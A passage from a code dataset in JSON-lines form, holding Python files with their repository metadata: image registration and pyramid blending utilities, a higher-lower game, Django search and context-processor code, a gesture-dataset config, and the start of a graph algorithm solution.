np.square(np.subtract(im2, curr_rigid_img)).mean() # mse with curr angle\n if mse < min_mse: # if this angle gave better result -> change\n min_mse = mse\n theta = t\n return theta\n\n\n# ------------------ Translation & Rigid by LK ----------------------\n\ndef findTranslationLK(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: image 1 in grayscale format.\n :param im2: image 1 after Translation.\n :return: Translation matrix by LK.\n \"\"\"\n MSE_min = sys.maxsize\n points, uv = opticalFlow(im1, im2) # get uv by LK\n (u1, v1) = uv[0]\n\n # find the best u,v --> minimize the MSE\n for (u, v) in uv:\n T = getWarpMatrix(\"trans\", 0, u, v)\n trans_img = cv2.warpPerspective(im1, T, im1.shape[::-1])\n MSE = np.square(im2 - trans_img).mean()\n if MSE < MSE_min:\n MSE_min = MSE\n u1, v1 = u, v\n\n return getWarpMatrix(\"trans\", 0, u1, v1)\n\n\ndef findRigidLK(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: origin img\n :param im2: rigid img\n :return: rigid matrix from im1 to im2\n \"\"\"\n\n theta = findTheta(im1, im2) # find theta\n matrix_rigid = getWarpMatrix(\"rigid_opp\", theta, 0, 0) # matrix to rotate img back to origin\n rotate_img = cv2.warpPerspective(im2, matrix_rigid, im2.shape[::-1]) # rotate im2 back to im1\n T = findTranslationLK(im1, rotate_img) # find translation matrix\n return getWarpMatrix(\"rigid\", theta, T[0, 2], T[1, 2]) # rigid matrix: translation+rotation\n\n\n# ------------------ Translation & Rigid by correlation ----------------------\n\ndef opticalFlowNCC(im1: np.ndarray, im2: np.ndarray, step_size, win_size):\n h = win_size // 2 # half of win\n uv = np.zeros((im1.shape[0], im1.shape[1], 2)) # for each pixel insert uv\n\n def Max_corr_idx(win: np.ndarray):\n \"\"\"\n win1: img1 curr window (template)\n norm1: norm of win1\n (same for img2)\n\n NCC = (win1-mean(win1) * win2-mean(win2)) / (||win1|| * ||win2||)\n\n :param win:\n :return:\n \"\"\"\n max_corr = -1000\n corr_idx = (0, 0)\n win1 = win.copy().flatten() - win.mean()\n norm1 = np.linalg.norm(win1, 2) # normalize win1\n\n # correlate win1 with img2, and sum the corr in current window\n for i in range(h, im2.shape[0] - h - 1):\n for j in range(h, im2.shape[1] - h - 1):\n win2 = im2[i - h: i + h + 1, j - h: j + h + 1] # get curr window from img2\n win2 = win2.copy().flatten() - win2.mean()\n norm2 = np.linalg.norm(win2, 2) # normalize win2\n norms = norm1 * norm2 # ||win1|| * ||win2||\n corr = 0 if norms == 0 else np.sum(win1 * win2) / norms # correlation sum\n\n # take the window that maximize the corr\n if corr > max_corr:\n 
max_corr = corr\n corr_idx = (i, j) # top left pixels of curr window\n return corr_idx\n\n # each iteration take window from img2, and send to 'Max_corr_idx()' to find template matching\n for y in range(h, im1.shape[0] - h - 1, step_size):\n for x in range(h, im1.shape[1] - h - 1, step_size):\n template = im1[y - h: y + h + 1, x - h: x + h + 1]\n if cv2.countNonZero(template) == 0:\n continue\n index = Max_corr_idx(template) # index of best 'template matching' in img2\n uv[y - h, x - h] = np.flip(index - np.array([y, x]))\n\n return uv\n\n\ndef findTranslationCorr(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n take median u,v from 'opticalFlowNCC()'\n :param im1: origin img\n :param im2: translated img\n :return: translation matrix\n \"\"\"\n uvs = opticalFlowNCC(im1, im2, 32, 13) # get uv of all pixels\n u, v = np.ma.median(np.ma.masked_where(\n uvs == np.zeros(2), uvs), axis=(0, 1)).filled(0) # take the median u,v\n return getWarpMatrix(\"trans\", 0, u, v)\n\n\ndef findRigidCorr(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: input image 1 in grayscale format.\n :param im2: image 1 after Rigid.\n :return: Rigid matrix by correlation.\n \"\"\"\n theta = findTheta(im1, im2) # find theta\n matrix_rigid = getWarpMatrix(\"rigid\", theta, 0, 0) # matrix to rotate img back to origin\n revers_img = cv2.warpPerspective(im1, matrix_rigid, im1.shape[::-1])\n T = findTranslationCorr(im2, revers_img) # find translation matrix\n\n return getWarpMatrix(\"rigid\", theta, T[0, 2], T[1, 2]) # rigid matrix: translation+rotation\n\n\n# ------------------ Warping ----------------------\n\ndef warpImages(im1: np.ndarray, im2: np.ndarray, T: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: input image 1 in grayscale format.\n :param im2: input image 2 in grayscale format.\n :param T: is a 3x3 matrix such that each pixel in image 2\n is mapped under homogenous coordinates to image 1 (p2=Tp1).\n :return: warp image 2 according to T and display both image1\n and the wrapped version of the image2 in the same figure.\n \"\"\"\n if im2.ndim == 3: # RGB img\n im2 = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n img_warp = np.zeros(im2.shape)\n TP = np.linalg.pinv(T)\n for i in range(im2.shape[0]):\n for j in range(im2.shape[1]):\n curr_idx = np.array([i, j, 1]) # curr index in new_img\n idx_orig = TP @ curr_idx # this pixel index after rotation in im2\n x = (idx_orig[0] // idx_orig[2]).astype(int) # back to 2D\n y = (idx_orig[1] // idx_orig[2]).astype(int) # back to 2D\n\n if 0 <= x < im2.shape[0] and 0 <= y < im2.shape[1]: # if index is in img range\n img_warp[i, j] = im2[x, y] # insert pixel to new_img\n\n return img_warp\n\n\n# ---------------------------------------------------------------------------\n# --------------------- Gaussian and Laplacian Pyramids ---------------------\n# ---------------------------------------------------------------------------\ndef blurImage(in_image: np.ndarray, k_size: int, n: int) -> np.ndarray:\n k = cv2.getGaussianKernel(k_size, -1)\n kernel = k * k.T\n return cv2.filter2D(in_image, -1, kernel * n)\n\n\ndef gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\n \"\"\"\n Creates a Gaussian Pyramid\n :param img: Original image\n :param levels: Pyramid depth\n :return: Gaussian pyramid (list of images)\n \"\"\"\n pyramid = [img]\n for i in range(1, levels):\n tmp = blurImage(pyramid[i - 1], 5, 1)\n tmp = tmp[::2, ::2]\n pyramid.append(tmp)\n return pyramid\n\n\ndef expandImg(img: np.ndarray, newShape) -> np.ndarray:\n expand = 
np.zeros(newShape)\n expand[::2, ::2] = img\n return blurImage(expand, 5, 4)\n\n\ndef laplaceianReduce(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\n \"\"\"\n Creates a Laplacian pyramid\n :param img: Original image\n :param levels: Pyramid depth\n :return: Laplacian Pyramid (list of images)\n \"\"\"\n gauss_pyr = gaussianPyr(img, levels)\n for i in range(levels - 1):\n gauss_pyr[i] = gauss_pyr[i] - expandImg(gauss_pyr[i + 1], gauss_pyr[i].shape)\n return gauss_pyr\n\n\ndef laplaceianExpand(lap_pyr: List[np.ndarray]) -> np.ndarray:\n \"\"\"\n Restores the original image from a laplacian pyramid\n :param lap_pyr: Laplacian Pyramid\n :return: Original image\n \"\"\"\n img = lap_pyr[-1]\n for i in range(len(lap_pyr) - 1, 0, -1):\n expand = expandImg(img, lap_pyr[i - 1].shape)\n img = expand + lap_pyr[i - 1]\n return img\n\n\ndef pyrBlend(img_1: np.ndarray, img_2: np.ndarray,\n mask: np.ndarray, levels: int) -> (np.ndarray, np.ndarray):\n \"\"\"\n Blends two images using PyramidBlend method\n :param img_1: Image 1\n :param img_2: Image 2\n :param mask: Blend mask\n :param levels: Pyramid depth\n :return: (Naive blend, Blended Image)\n \"\"\"\n naive = mask * img_1 + (1 - mask) * img_2\n\n lapPyr_img1 = laplaceianReduce(img_1, levels)\n lapPyr_img2 = laplaceianReduce(img_2, levels)\n gaussPyr_mask = gaussianPyr(mask, levels)\n\n mergeN = lapPyr_img1[-1] * gaussPyr_mask[-1] + (1 - gaussPyr_mask[-1]) * lapPyr_img2[-1]\n for i in range(levels - 1, 0, -1):\n expand = expandImg(mergeN, lapPyr_img1[i - 1].shape)\n mergeN = expand + lapPyr_img1[i - 1] * gaussPyr_mask[i - 1] + (1 - gaussPyr_mask[i - 1]) * lapPyr_img2[i - 1]\n\n return naive, mergeN\n", "repo_name": "renanarimon/imageProcessing", "sub_path": "Ex3/ex3_utils.py", "file_name": "ex3_utils.py", "file_ext": "py", "file_size_in_byte": 14688, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.int", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_DEFAULT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_DEFAULT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scipy.signal.convolve2d", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.linalg.eigvals", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.linalg", 
"line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 142, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 153, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 182, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 214, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 218, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 232, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.countNonZero", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 261, "usage_type": "attribute"}, {"api_name": "numpy.ma.median", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 269, "usage_type": "attribute"}, {"api_name": "numpy.ma.masked_where", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 270, "usage_type": "call"}, {"api_name": 
"numpy.ndarray", "line_number": 274, "usage_type": "attribute"}, {"api_name": "cv2.warpPerspective", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 290, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 300, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 300, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 319, "usage_type": "attribute"}, {"api_name": "cv2.getGaussianKernel", "line_number": 320, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 325, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 325, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 340, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 346, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 346, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 359, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 372, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 373, "usage_type": "attribute"}]} +{"seq_id": "54759167", "text": "import random\n\nimport art\nfrom game_data import data\n\n\n# import os\n\n# def cls():\n# os.system('cls' if os.name=='nt' else 'clear')\n\n# # now, to clear the screen\n\n\ndef get_person():\n return random.choice(data)\n\n\ndef setup(score):\n print(art.logo)\n if score != 0:\n print(f'You\\'re right! Current score: {score}.')\n per1 = get_person()\n print(f\"Compare A: {per1['name']}, a {per1['description']}, from {per1['country']}.\", end='')\n print(art.vs)\n per2 = get_person()\n\n while per1 == per2:\n per2 = get_person()\n print(f\"Against B: {per2['name']}, a {per2['description']}, from {per2['country']}.\")\n\n return per1['follower_count'], per2['follower_count']\n\n\ndef winner_A_OR_B(followers):\n if followers[0] > followers[1]:\n return 'A'\n else:\n return 'B'\n\n\ndef game():\n score = 0\n\n while True:\n followers_in_tuple = setup(score)\n print(followers_in_tuple)\n winner = winner_A_OR_B(followers_in_tuple)\n\n choose = input('Who has more followers?\\nType \"A\" or \"B\": ').lower()\n\n if choose == winner.lower():\n score += 1\n # cls()\n\n else:\n print(f'Sorry, thats\\'s wrong. 
Final score: {score}.')\n break\n\n\ngame()\n", "repo_name": "not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022", "sub_path": "Day 14 - Beginner - Higher Lower Game Project/01_PROJECT_higher_lower_game/higher_lower_game.py", "file_name": "higher_lower_game.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "game_data.data", "line_number": 16, "usage_type": "argument"}, {"api_name": "art.logo", "line_number": 20, "usage_type": "attribute"}, {"api_name": "art.vs", "line_number": 25, "usage_type": "attribute"}]} +{"seq_id": "22431352135", "text": "from api.utils import failure_response\nfrom api.utils import success_response\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom rapidfuzz import process as fuzzymatch\nfrom rest_framework import status\n\n\nclass SearchPersonController:\n def __init__(self, request, serializer):\n self._request = request\n self._data = request.data\n self._serializer = serializer\n\n def process(self):\n users = User.objects.filter(\n Q(person__has_onboarded=True) & Q(person__soft_deleted=False)\n )\n query = self._request.GET.get(\"query\")\n # Check if query was provided and isn't whitespace\n if query is not None and query.strip() != \"\":\n # Create processor to ignore query but convert User object into string choice\n def user_properties(user):\n return [user.first_name.lower(), user.last_name.lower()]\n\n def processor(user):\n return user if type(user) is str else \" \".join(user_properties(user))\n\n searched_users = fuzzymatch.extract(\n query.lower(), users, processor=processor\n )\n # Extract the users from the returned tuple list\n users = list(map(lambda searched_user: searched_user[0], searched_users))\n\n page_size = self._request.GET.get(\"page_size\")\n page_number = self._request.GET.get(\"page_number\")\n if page_size is not None and page_number is not None:\n paginator = Paginator(users, page_size)\n try:\n page = paginator.page(page_number)\n users = page.object_list\n except:\n return failure_response(\"Page not found\", status.HTTP_404_NOT_FOUND)\n return success_response(\n self._serializer(\n users, context={\"request_user\": self._request.user}, many=True\n ).data,\n status.HTTP_200_OK,\n )\n", "repo_name": "cuappdev/pear-django-backend", "sub_path": "src/person/controllers/search_person_controller.py", "file_name": "search_person_controller.py", "file_ext": "py", "file_size_in_byte": 1999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 18, "usage_type": "call"}, {"api_name": "rapidfuzz.process.extract", "line_number": 30, "usage_type": "call"}, {"api_name": "rapidfuzz.process", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 39, "usage_type": "call"}, {"api_name": "api.utils.failure_response", "line_number": 44, "usage_type": "call"}, {"api_name": 
"rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 44, "usage_type": "name"}, {"api_name": "api.utils.success_response", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 49, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "39788835306", "text": "import sys\nimport os, os.path as osp\n\nfrom copy import deepcopy\nfrom easydict import EasyDict as edict\n\ntry :\n from .base import Config_Data as Base_Data\nexcept :\n from base import Config_Data as Base_Data\n\nclass Config_Data(Base_Data) :\n \"\"\"INFO: http://www-rech.telecom-lille.fr/shrec2017-hand/\"\"\"\n name = 'hgr_shrec_2017';\n\n raw_split_files = edict({\n 'train': 'train_gestures.txt',\n 'test': 'test_gestures.txt',\n });\n\n split_dir = 'split_files';\n split_types = (\n 'single', # only single finger samples\n 'multiple', # only multiple finger samples\n 'agnostic', # single or multiple, don't care\n 'specific', # separate class id for single and multiple\n );\n\n split_files = edict({\n 'train': 'train.txt',\n 'val': 'val.txt',\n 'testval': 'val.txt',\n 'testtest': 'test.txt',\n 'testtrain': 'train.txt',\n 'test': 'test.txt',\n });\n\n # mean = edict({\n # 'x': -0.1047,\n # 'y': 0.4933,\n # 'z': -1.0664,\n # 'remission': 0.2861,\n # 'depth': 11.5944,\n # });\n\n # std = edict({\n # 'x': 12.0863,\n # 'y': 8.6324,\n # 'z': 0.8396,\n # 'remission': 0.1409,\n # 'depth': 9.6167,\n # }); \n\n\n __label_to_name = {\n 0: 'grab',\n 1: 'tap',\n 2: 'expand',\n 3: 'pinch',\n 4: 'rotate_cw',\n 5: 'rotate_ccw',\n 6: 'swipe_right',\n 7: 'swipe_left',\n 8: 'swipe_up',\n 9: 'swipe_down',\n 10: 'swipe_x',\n 11: 'swipe_+',\n 12: 'swipe_v',\n 13: 'shake',\n };\n\n label_to_name = {};\n\n __label_to_type = {\n \t0: 'fine',\n \t1: 'coarse',\n \t2: 'fine',\n \t3: 'fine',\n \t4: 'fine',\n \t5: 'fine',\n \t6: 'coarse',\n \t7: 'coarse',\n \t8: 'coarse',\n \t9: 'coarse',\n \t10: 'coarse',\n \t11: 'coarse',\n \t12: 'coarse',\n \t13: 'coarse',\n }; \n\n label_to_type = {};\n\n # class frequency - number of samples per class\n class_freq = {\n 'train': {\n 0: 72,\n 1: 70,\n 2: 67,\n 3: 72,\n 4: 73,\n 5: 72,\n 6: 73,\n 7: 76,\n 8: 71,\n 9: 74,\n 10: 68,\n 11: 74,\n 12: 67,\n 13: 71,\n 14: 74,\n 15: 72,\n 16: 68,\n 17: 64,\n 18: 69,\n 19: 70,\n 20: 67,\n 21: 64,\n 22: 72,\n 23: 71,\n 24: 72,\n 25: 70,\n 26: 62,\n 27: 65,\n },\n\n 'val': {\n 0: 28,\n 1: 30,\n 2: 33,\n 3: 28,\n 4: 27,\n 5: 28,\n 6: 27,\n 7: 24,\n 8: 29,\n 9: 26,\n 10: 32,\n 11: 26,\n 12: 33,\n 13: 29,\n 14: 26,\n 15: 28,\n 16: 32,\n 17: 36,\n 18: 31,\n 19: 30,\n 20: 33,\n 21: 36,\n 22: 28,\n 23: 29,\n 24: 28,\n 25: 30,\n 26: 38,\n 27: 35,\n },\n };\n\n\n def __init__(self, root_dir) :\n \"\"\" define all the data directories and subdirectories \"\"\"\n assert osp.isdir(root_dir), f\"Root directory {root_dir} not found.\";\n self.root_dir = os.path.expanduser(root_dir);\n\n for k in self.raw_split_files :\n self.raw_split_files[k] = osp.join(self.root_dir, self.raw_split_files[k]);\n\n self.split_dir = osp.join(self.root_dir, self.split_dir);\n for k in self.split_types :\n os.makedirs(osp.join(self.split_dir, k), exist_ok=True);\n\n self._extend_label_maps_w_split_types();\n\n\n def assert_split_type(self, type_) :\n assert type_ in self.split_types, \\\n f\"Split type {type_} must be one of {self.split_types}\";\n\n\n def get_split_filepath(self, type_, mode_) :\n 
self.assert_mode(mode_);\n self.assert_split_type(type_);\n fpath = osp.join(self.split_dir, type_, self.split_files[mode_]);\n if not osp.isfile(fpath) :\n fpath = osp.join(self.split_dir, self.split_files[mode_]);\n assert osp.isfile(fpath), f\"Split file not found = {fpath}\";\n \n return fpath;\n\n\n def _extend_label_maps_w_split_types(self) :\n self.label_to_name['single'] = deepcopy(self.__label_to_name);\n self.label_to_type['single'] = deepcopy(self.__label_to_type);\n self.label_to_name['multiple'] = deepcopy(self.__label_to_name);\n self.label_to_type['multiple'] = deepcopy(self.__label_to_type);\n self.label_to_name['agnostic'] = deepcopy(self.__label_to_name);\n self.label_to_type['agnostic'] = deepcopy(self.__label_to_type);\n\n self.label_to_name['specific'] = {};\n self.label_to_type['specific'] = {}; \n for k in self.__label_to_name :\n self.label_to_name['specific'][2*k] = self.__label_to_name[k] + '_1'; \n self.label_to_name['specific'][2*k+1] = self.__label_to_name[k] + '_2';\n self.label_to_type['specific'][2*k] = self.__label_to_type[k]; \n self.label_to_type['specific'][2*k+1] = self.__label_to_type[k]; \n\n\n def get_n_classes(self, type_) :\n return len(self.label_to_name[type_]);\n\n\nif __name__ == \"__main__\" :\n from pprint import pprint\n cfg_data = Config_Data(\"/data/datasets/agr/shrec2017\");\n\n for stype in cfg_data.split_types :\n print(f'{stype} names =>'); pprint(cfg_data.label_to_name[stype]);\n print();\n print(f'{stype} types =>'); pprint(cfg_data.label_to_type[stype]);\n print();\n \n", "repo_name": "humansensinglab/dfcil-hgr", "sub_path": "configs/datasets/hgr_shrec_2017.py", "file_name": "hgr_shrec_2017.py", "file_ext": "py", "file_size_in_byte": 5741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "base.Config_Data", "line_number": 12, "usage_type": "name"}, {"api_name": "easydict.EasyDict", "line_number": 16, "usage_type": "call"}, {"api_name": "easydict.EasyDict", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 191, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 192, "usage_type": "call"}, 
{"api_name": "copy.deepcopy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 194, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 195, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 196, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 216, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 218, "usage_type": "call"}]} +{"seq_id": "33534660567", "text": "from django.conf import settings\nfrom datawarehouse.models import DimUser\n\n\ndef app_env(request):\n \"\"\" This function adds value of APP_ENV variable to template context\n It used to define login and logout pages. If we are running in production\n enviroment, use auth_pubtkt. In dev enviroment, use local django auth system\n \"\"\"\n\n env = {\"APP_ENV\": settings.APP_ENV,\n \"LOGIN_URL\": settings.LOGIN_URL,\n \"REDIRECT_FIELD_NAME\": getattr(settings, 'REDIRECT_FIELD_NAME', 'next'),\n \"LOGOUT_URL\": settings.LOGOUT_URL}\n if hasattr(settings, \"SERVER_MAINTENANCE_MESSAGE\"):\n env[\"SERVER_MAINTENANCE_MESSAGE\"] = settings.SERVER_MAINTENANCE_MESSAGE\n return env\n\n\ndef app_dim_user(request):\n if request.user.is_anonymous():\n return {}\n else:\n return {'dim_user': DimUser.objects.get_or_create(username=request.user.username)[0]}", "repo_name": "vecnet/dw", "sub_path": "lib/context_processors.py", "file_name": "context_processors.py", "file_ext": "py", "file_size_in_byte": 894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.settings.APP_ENV", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.LOGIN_URL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.settings.LOGOUT_URL", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.settings", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.conf.settings.SERVER_MAINTENANCE_MESSAGE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "datawarehouse.models.DimUser.objects.get_or_create", "line_number": 24, "usage_type": "call"}, {"api_name": "datawarehouse.models.DimUser.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "datawarehouse.models.DimUser", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "38282701619", "text": "from typing import (\n DefaultDict,\n Dict,\n Iterator,\n List,\n NamedTuple,\n Optional,\n Set,\n Union,\n)\nfrom bisect import (\n bisect_left,\n bisect_right,\n)\nfrom itertools import (\n accumulate,\n chain,\n combinations,\n cycle,\n islice,\n permutations,\n product,\n repeat,\n takewhile,\n)\nfrom functools import (\n cached_property,\n)\nfrom collections import (\n defaultdict,\n deque,\n Counter,\n)\n\n\nclass Solution:\n def closestMeetingNode(self, edges: List[int], node1: int, node2: int) -> int:\n reachable = defaultdict(set)\n for from_node, destination_node in enumerate(edges):\n if destination_node != -1:\n reachable[from_node].add(destination_node)\n\n # noinspection PyShadowingNames\n def bfs(origin_node: int):\n visited 
